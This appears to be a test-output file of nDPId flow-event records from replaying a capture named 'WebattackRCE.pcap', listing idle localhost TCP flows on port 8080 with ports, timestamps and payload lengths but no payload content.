-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 